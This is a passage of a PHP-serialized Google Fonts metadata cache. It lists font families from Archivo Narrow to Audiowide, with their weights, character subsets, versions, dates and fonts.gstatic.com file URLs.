Narrow\";s:8:\"variants\";a:8:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:6:\"italic\";i:5;s:9:\"500italic\";i:6;s:9:\"600italic\";i:7;s:9:\"700italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":8:{s:7:\"regular\";s:103:\"http://fonts.gstatic.com/s/archivonarrow/v24/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFGKpHOtFCQ76Q.ttf\";s:3:\"500\";s:103:\"http://fonts.gstatic.com/s/archivonarrow/v24/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvHlGKpHOtFCQ76Q.ttf\";s:3:\"600\";s:103:\"http://fonts.gstatic.com/s/archivonarrow/v24/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhv8laKpHOtFCQ76Q.ttf\";s:3:\"700\";s:103:\"http://fonts.gstatic.com/s/archivonarrow/v24/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvy1aKpHOtFCQ76Q.ttf\";s:6:\"italic\";s:105:\"http://fonts.gstatic.com/s/archivonarrow/v24/tss7ApVBdCYD5Q7hcxTE1ArZ0bb1k3JSLwe1hB965BJi53mpNiEr6T6Y.ttf\";s:9:\"500italic\";s:105:\"http://fonts.gstatic.com/s/archivonarrow/v24/tss7ApVBdCYD5Q7hcxTE1ArZ0bb1k3JSLwe1hB965BJQ53mpNiEr6T6Y.ttf\";s:9:\"600italic\";s:105:\"http://fonts.gstatic.com/s/archivonarrow/v24/tss7ApVBdCYD5Q7hcxTE1ArZ0bb1k3JSLwe1hB965BK84HmpNiEr6T6Y.ttf\";s:9:\"700italic\";s:105:\"http://fonts.gstatic.com/s/archivonarrow/v24/tss7ApVBdCYD5Q7hcxTE1ArZ0bb1k3JSLwe1hB965BKF4HmpNiEr6T6Y.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:81;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Are You Serious\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/areyouserious/v10/ll8kK2GVSSr-PtjQ5nONVcNn4306hT9nCGRayg.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:82;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Aref Ruqaa\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v23\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/arefruqaa/v23/WwkbxPW1E165rajQKDulEIAiVNo5xNY.ttf\";s:3:\"700\";s:80:\"http://fonts.gstatic.com/s/arefruqaa/v23/WwkYxPW1E165rajQKDulKDwNcNIS2N_7Bdk.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:83;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Aref Ruqaa Ink\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v5\";s:12:\"lastModified\";s:10:\"2022-09-14\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/arefruqaaink/v5/1q2fY5WOGUFlt84GTOkP6Kdx72ThVIGpgnxL.ttf\";s:3:\"700\";s:87:\"http://fonts.gstatic.com/s/arefruqaaink/v5/1q2cY5WOGUFlt84GTOkP6Kdx71xde6WhqWBCyxWn.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:84;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Arima\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";}s:7:\"subsets\";a:7:{i:0;s:5:\"greek\";i:1;s:9:\"greek-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:9:\"malayalam\";i:5;s:5:\"tamil\";i:6;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v1\";s:12:\"lastModified\";s:10:\"2022-06-28\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"100\";s:82:\"http://fonts.gstatic.com/s/arima/v1/neIWzCqmt4Aup_qE1nFWqxI1RZX1YTE-pQGOyYw2fw.ttf\";s:3:\"200\";s:82:\"http://fonts.gstatic.com/s/arima/v1/neIWzCqmt4Aup_qE1nFWqxI1RZX14TA-pQGOyYw2fw.ttf\";s:3:\"300\";s:82:\"http://fonts.gstatic.com/s/arima/v1/neIWzCqmt4Aup_qE1nFWqxI1RZX1PzA-pQGOyYw2fw.ttf\";s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/arima/v1/neIWzCqmt4Aup_qE1nFWqxI1RZX1YTA-pQGOyYw2fw.ttf\";s:3:\"500\";s:82:\"http://fonts.gstatic.com/s/arima/v1/neIWzCqmt4Aup_qE1nFWqxI1RZX1UzA-pQGOyYw2fw.ttf\";s:3:\"600\";s:82:\"http://fonts.gstatic.com/s/arima/v1/neIWzCqmt4Aup_qE1nFWqxI1RZX1vzc-pQGOyYw2fw.ttf\";s:3:\"700\";s:82:\"http://fonts.gstatic.com/s/arima/v1/neIWzCqmt4Aup_qE1nFWqxI1RZX1hjc-pQGOyYw2fw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:85;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Arima Madurai\";s:8:\"variants\";a:8:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:5:\"tamil\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":8:{s:3:\"100\";s:86:\"http://fonts.gstatic.com/s/arimamadurai/v14/t5t4IRoeKYORG0WNMgnC3seB1V3PqrGCch4Drg.ttf\";s:3:\"200\";s:87:\"http://fonts.gstatic.com/s/arimamadurai/v14/t5t7IRoeKYORG0WNMgnC3seB1fHuipusfhcat2c.ttf\";s:3:\"300\";s:87:\"http://fonts.gstatic.com/s/arimamadurai/v14/t5t7IRoeKYORG0WNMgnC3seB1ZXtipusfhcat2c.ttf\";s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/arimamadurai/v14/t5tmIRoeKYORG0WNMgnC3seB7TnFrpOHYh4.ttf\";s:3:\"500\";s:87:\"http://fonts.gstatic.com/s/arimamadurai/v14/t5t7IRoeKYORG0WNMgnC3seB1c3sipusfhcat2c.ttf\";s:3:\"700\";s:87:\"http://fonts.gstatic.com/s/arimamadurai/v14/t5t7IRoeKYORG0WNMgnC3seB1YXqipusfhcat2c.ttf\";s:3:\"800\";s:87:\"http://fonts.gstatic.com/s/arimamadurai/v14/t5t7IRoeKYORG0WNMgnC3seB1Znpipusfhcat2c.ttf\";s:3:\"900\";s:87:\"http://fonts.gstatic.com/s/arimamadurai/v14/t5t7IRoeKYORG0WNMgnC3seB1b3oipusfhcat2c.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:86;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Arimo\";s:8:\"variants\";a:8:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:6:\"italic\";i:5;s:9:\"500italic\";i:6;s:9:\"600italic\";i:7;s:9:\"700italic\";}s:7:\"subsets\";a:8:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:6:\"hebrew\";i:5;s:5:\"latin\";i:6;s:9:\"latin-ext\";i:7;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v27\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":8:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/arimo/v27/P5sfzZCDf9_T_3cV7NCUECyoxNk37cxsBxDAVQI4aA.ttf\";s:3:\"500\";s:83:\"http://fonts.gstatic.com/s/arimo/v27/P5sfzZCDf9_T_3cV7NCUECyoxNk338xsBxDAVQI4aA.ttf\";s:3:\"600\";s:83:\"http://fonts.gstatic.com/s/arimo/v27/P5sfzZCDf9_T_3cV7NCUECyoxNk3M8tsBxDAVQI4aA.ttf\";s:3:\"700\";s:83:\"http://fonts.gstatic.com/s/arimo/v27/P5sfzZCDf9_T_3cV7NCUECyoxNk3CstsBxDAVQI4aA.ttf\";s:6:\"italic\";s:85:\"http://fonts.gstatic.com/s/arimo/v27/P5sdzZCDf9_T_10c3i9MeUcyat4iJY-ERBrEdwcoaKww.ttf\";s:9:\"500italic\";s:85:\"http://fonts.gstatic.com/s/arimo/v27/P5sdzZCDf9_T_10c3i9MeUcyat4iJY-2RBrEdwcoaKww.ttf\";s:9:\"600italic\";s:85:\"http://fonts.gstatic.com/s/arimo/v27/P5sdzZCDf9_T_10c3i9MeUcyat4iJY9aQxrEdwcoaKww.ttf\";s:9:\"700italic\";s:85:\"http://fonts.gstatic.com/s/arimo/v27/P5sdzZCDf9_T_10c3i9MeUcyat4iJY9jQxrEdwcoaKww.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:87;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Arizonia\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/arizonia/v19/neIIzCemt4A5qa7mv6WGHK06UY30.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:88;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Armata\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/armata/v19/gokvH63_HV5jQ-E9lD53Q2u_mQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:89;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Arsenal\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/arsenal/v12/wXKrE3kQtZQ4pF3D11_WAewrhXY.ttf\";s:6:\"italic\";s:73:\"http://fonts.gstatic.com/s/arsenal/v12/wXKpE3kQtZQ4pF3D513cBc4ulXYrtA.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/arsenal/v12/wXKuE3kQtZQ4pF3D7-P5JeQAmX8yrdk.ttf\";s:9:\"700italic\";s:77:\"http://fonts.gstatic.com/s/arsenal/v12/wXKsE3kQtZQ4pF3D513kueEKnV03vdnKjw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:90;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Artifika\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/artifika/v20/VEMyRoxzronptCuxu6Wt5jDtreOL.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:91;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Arvo\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/arvo/v20/tDbD2oWUg0MKmSAa7Lzr7vs.ttf\";s:6:\"italic\";s:66:\"http://fonts.gstatic.com/s/arvo/v20/tDbN2oWUg0MKqSIQ6J7u_vvijQ.ttf\";s:3:\"700\";s:67:\"http://fonts.gstatic.com/s/arvo/v20/tDbM2oWUg0MKoZw1yLTA8vL7lAE.ttf\";s:9:\"700italic\";s:70:\"http://fonts.gstatic.com/s/arvo/v20/tDbO2oWUg0MKqSIoVLHK9tD-hAHkGg.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:92;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Arya\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/arya/v19/ga6CawNG-HJd9Ub1-beqdFE.ttf\";s:3:\"700\";s:67:\"http://fonts.gstatic.com/s/arya/v19/ga6NawNG-HJdzfra3b-BaFg3dRE.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:93;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Asap\";s:8:\"variants\";a:8:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:6:\"italic\";i:5;s:9:\"500italic\";i:6;s:9:\"600italic\";i:7;s:9:\"700italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":8:{s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/asap/v24/KFO9CniXp96a4Tc2EZzSuDAoKsE61qhOUX-8AEEe.ttf\";s:3:\"500\";s:80:\"http://fonts.gstatic.com/s/asap/v24/KFO9CniXp96a4Tc2EZzSuDAoKsEI1qhOUX-8AEEe.ttf\";s:3:\"600\";s:80:\"http://fonts.gstatic.com/s/asap/v24/KFO9CniXp96a4Tc2EZzSuDAoKsHk0ahOUX-8AEEe.ttf\";s:3:\"700\";s:80:\"http://fonts.gstatic.com/s/asap/v24/KFO9CniXp96a4Tc2EZzSuDAoKsHd0ahOUX-8AEEe.ttf\";s:6:\"italic\";s:83:\"http://fonts.gstatic.com/s/asap/v24/KFO7CniXp96ayz4E7kS706qGLdTylUANW3ueBVEeezU.ttf\";s:9:\"500italic\";s:83:\"http://fonts.gstatic.com/s/asap/v24/KFO7CniXp96ayz4E7kS706qGLdTylXINW3ueBVEeezU.ttf\";s:9:\"600italic\";s:83:\"http://fonts.gstatic.com/s/asap/v24/KFO7CniXp96ayz4E7kS706qGLdTylZ4KW3ueBVEeezU.ttf\";s:9:\"700italic\";s:83:\"http://fonts.gstatic.com/s/asap/v24/KFO7CniXp96ayz4E7kS706qGLdTylacKW3ueBVEeezU.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:94;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Asap Condensed\";s:8:\"variants\";a:8:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":8:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/asapcondensed/v15/pxidypY1o9NHyXh3WvSbGSggdNeLYk1Mq3ap.ttf\";s:6:\"italic\";s:88:\"http://fonts.gstatic.com/s/asapcondensed/v15/pxifypY1o9NHyXh3WvSbGSggdOeJaElurmapvvM.ttf\";s:3:\"500\";s:89:\"http://fonts.gstatic.com/s/asapcondensed/v15/pxieypY1o9NHyXh3WvSbGSggdO9_S2lEgGqgp-pO.ttf\";s:9:\"500italic\";s:92:\"http://fonts.gstatic.com/s/asapcondensed/v15/pxiYypY1o9NHyXh3WvSbGSggdOeJUL1Him6CovpOkXA.ttf\";s:3:\"600\";s:89:\"http://fonts.gstatic.com/s/asapcondensed/v15/pxieypY1o9NHyXh3WvSbGSggdO9TTGlEgGqgp-pO.ttf\";s:9:\"600italic\";s:92:\"http://fonts.gstatic.com/s/asapcondensed/v15/pxiYypY1o9NHyXh3WvSbGSggdOeJUJFAim6CovpOkXA.ttf\";s:3:\"700\";s:89:\"http://fonts.gstatic.com/s/asapcondensed/v15/pxieypY1o9NHyXh3WvSbGSggdO83TWlEgGqgp-pO.ttf\";s:9:\"700italic\";s:92:\"http://fonts.gstatic.com/s/asapcondensed/v15/pxiYypY1o9NHyXh3WvSbGSggdOeJUPVBim6CovpOkXA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:95;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Asar\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/asar/v22/sZlLdRyI6TBIXkYQDLlTW6E.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:96;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Asset\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/asset/v24/SLXGc1na-mM4cWImRJqExst1.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:97;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Assistant\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";}s:7:\"subsets\";a:3:{i:0;s:6:\"hebrew\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"200\";s:92:\"http://fonts.gstatic.com/s/assistant/v18/2sDPZGJYnIjSi6H75xkZZE1I0yCmYzzQtmZnEGGf3qGuvM4.ttf\";s:3:\"300\";s:92:\"http://fonts.gstatic.com/s/assistant/v18/2sDPZGJYnIjSi6H75xkZZE1I0yCmYzzQtrhnEGGf3qGuvM4.ttf\";s:7:\"regular\";s:92:\"http://fonts.gstatic.com/s/assistant/v18/2sDPZGJYnIjSi6H75xkZZE1I0yCmYzzQtuZnEGGf3qGuvM4.ttf\";s:3:\"500\";s:92:\"http://fonts.gstatic.com/s/assistant/v18/2sDPZGJYnIjSi6H75xkZZE1I0yCmYzzQttRnEGGf3qGuvM4.ttf\";s:3:\"600\";s:92:\"http://fonts.gstatic.com/s/assistant/v18/2sDPZGJYnIjSi6H75xkZZE1I0yCmYzzQtjhgEGGf3qGuvM4.ttf\";s:3:\"700\";s:92:\"http://fonts.gstatic.com/s/assistant/v18/2sDPZGJYnIjSi6H75xkZZE1I0yCmYzzQtgFgEGGf3qGuvM4.ttf\";s:3:\"800\";s:92:\"http://fonts.gstatic.com/s/assistant/v18/2sDPZGJYnIjSi6H75xkZZE1I0yCmYzzQtmZgEGGf3qGuvM4.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:98;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Astloch\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v26\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/astloch/v26/TuGRUVJ8QI5GSeUjq9wRzMtkH1Q.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/astloch/v26/TuGUUVJ8QI5GSeUjk2A-6MNPA10xLMQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:99;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Asul\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/asul/v19/VuJ-dNjKxYr46fMFXK78JIg.ttf\";s:3:\"700\";s:67:\"http://fonts.gstatic.com/s/asul/v19/VuJxdNjKxYr40U8qeKbXOIFneRo.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:100;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Athiti\";s:8:\"variants\";a:6:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:4:\"thai\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":6:{s:3:\"200\";s:72:\"http://fonts.gstatic.com/s/athiti/v12/pe0sMISdLIZIv1wAxDNyAv2-C99ycg.ttf\";s:3:\"300\";s:72:\"http://fonts.gstatic.com/s/athiti/v12/pe0sMISdLIZIv1wAoDByAv2-C99ycg.ttf\";s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/athiti/v12/pe0vMISdLIZIv1w4DBhWCtaiAg.ttf\";s:3:\"500\";s:72:\"http://fonts.gstatic.com/s/athiti/v12/pe0sMISdLIZIv1wA-DFyAv2-C99ycg.ttf\";s:3:\"600\";s:72:\"http://fonts.gstatic.com/s/athiti/v12/pe0sMISdLIZIv1wA1DZyAv2-C99ycg.ttf\";s:3:\"700\";s:72:\"http://fonts.gstatic.com/s/athiti/v12/pe0sMISdLIZIv1wAsDdyAv2-C99ycg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:101;O:8:\"stdClass\":8:{s:6:\"family\";s:21:\"Atkinson Hyperlegible\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:102:\"http://fonts.gstatic.com/s/atkinsonhyperlegible/v10/9Bt23C1KxNDXMspQ1lPyU89-1h6ONRlW45GE5ZgpewSSbQ.ttf\";s:6:\"italic\";s:104:\"http://fonts.gstatic.com/s/atkinsonhyperlegible/v10/9Bt43C1KxNDXMspQ1lPyU89-1h6ONRlW45G055ItWQGCbUWn.ttf\";s:3:\"700\";s:106:\"http://fonts.gstatic.com/s/atkinsonhyperlegible/v10/9Bt73C1KxNDXMspQ1lPyU89-1h6ONRlW45G8WbcNcy-OZFy-FA.ttf\";s:9:\"700italic\";s:108:\"http://fonts.gstatic.com/s/atkinsonhyperlegible/v10/9Bt93C1KxNDXMspQ1lPyU89-1h6ONRlW45G056qRdiWKRlmuFH24.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:102;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Atma\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:7:\"bengali\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:67:\"http://fonts.gstatic.com/s/atma/v15/uK_z4rqWc-Eoo8JzKjc9PvedRkM.ttf\";s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/atma/v15/uK_84rqWc-Eom25bDj8WIv4.ttf\";s:3:\"500\";s:67:\"http://fonts.gstatic.com/s/atma/v15/uK_z4rqWc-Eoo5pyKjc9PvedRkM.ttf\";s:3:\"600\";s:67:\"http://fonts.gstatic.com/s/atma/v15/uK_z4rqWc-Eoo7Z1Kjc9PvedRkM.ttf\";s:3:\"700\";s:67:\"http://fonts.gstatic.com/s/atma/v15/uK_z4rqWc-Eoo9J0Kjc9PvedRkM.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:103;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Atomic Age\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v27\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/atomicage/v27/f0Xz0eug6sdmRFkYZZGL58Ht9a8GYeA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:104;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Aubrey\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v28\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/aubrey/v28/q5uGsou7NPBw-p7vugNsCxVEgA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:105;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Audiowide\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s